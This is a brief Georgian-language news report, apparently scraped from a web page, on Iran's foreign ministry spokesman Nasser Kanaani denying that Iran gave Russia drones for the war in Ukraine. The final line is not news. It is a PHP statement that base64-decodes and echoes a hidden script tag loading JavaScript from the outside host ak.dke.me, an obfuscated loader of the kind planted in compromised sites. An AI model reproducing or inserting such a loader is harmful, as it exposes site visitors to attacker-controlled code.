celsiusi
ავერსი საქკაბელი

ირანი რუსეთისთვის უკრაინის წინააღმდეგ გამოსაყენებლად უპილოტო საფრენი აპარატების გადაცემის ფაქტს უარყოფს. ინფორმაციას უკრაინული მედია ავრცელებს.

გავრცელებული ინფორმაციით, ამ შინაარსის განცხადება ირანის საგარეო საქმეთა სამინისტროს წარმომადგენელმა, ნასერ კანანიმ გააკეთა.

„ირანის ისლამური რესპუბლიკა გავრცელებულ ამბავს, კონფლიქტში გამოსაყენებლად რუსეთისთვის დრონების გადაცემის შესახებ, უსაფუძვლოდ მიიჩნევს და არ ადასტურებს“, –  განაცხადა კანანიმ.

მისი თქმით, ირანი ნეიტრალიტეტის და კონფლიქტში არ ჩარევის პოლიტიკას აგრძელებს.

ცნობისთვის, უკრაინის შეიარაღებულმა ძალებმა, ირანული უპილოტო საფრენი აპარატი რამდენიმე კვირის წინ გაანადგურეს, რომელსაც რუსეთი ქვეყნის აღმოსავლეთში ბრძოლის ველზე იყენებდა.

484
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");